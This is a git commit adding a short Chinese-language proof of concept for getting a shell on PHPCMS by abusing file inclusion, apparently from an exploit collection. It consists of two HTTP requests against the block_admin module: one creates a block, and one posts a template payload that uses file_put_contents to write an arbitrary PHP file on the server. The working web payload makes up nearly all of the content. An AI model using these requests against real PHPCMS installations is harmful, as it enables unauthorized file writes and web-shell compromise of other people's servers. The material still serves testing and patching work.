add phpcms 利用文件包含创建任意文件getshell

2022-03-01 16:46:02 +08:00 · 2022-03-01 16:46:02 +08:00 · 8292471328
commit 8292471328
parent b9ae455d15
2 changed files with 22 additions and 0 deletions
--- a/CMS/PHPcms/PHPCMS
+++ b/CMS/PHPcms/PHPCMS
@ -0,0 +1,22 @@
+
+
+> 利用文件包含创建任意文件getshell
+
+
+## 利用过程
+1. 创建表
+```http request
+http://www.test.com/index.php?m=block&c=block_admin&pc_hash=123456&a=add&pos=1
+
+post 数据
+dosubmit=1&name=test&type=2
+```
+
+2. 写入phpinfo
+```http request
+http://www.test.com/index.php?m=block&c=block_admin&a=public_view&id=4
+
+post 数据
+template=<?php file_put_contents("phpinfo.php","<?php phpinfo();?>");
+```
+![phpinfo](images/phpinfo.png)
--- a/V9.6.3/images/phpinfo.png
+++ b/V9.6.3/images/phpinfo.png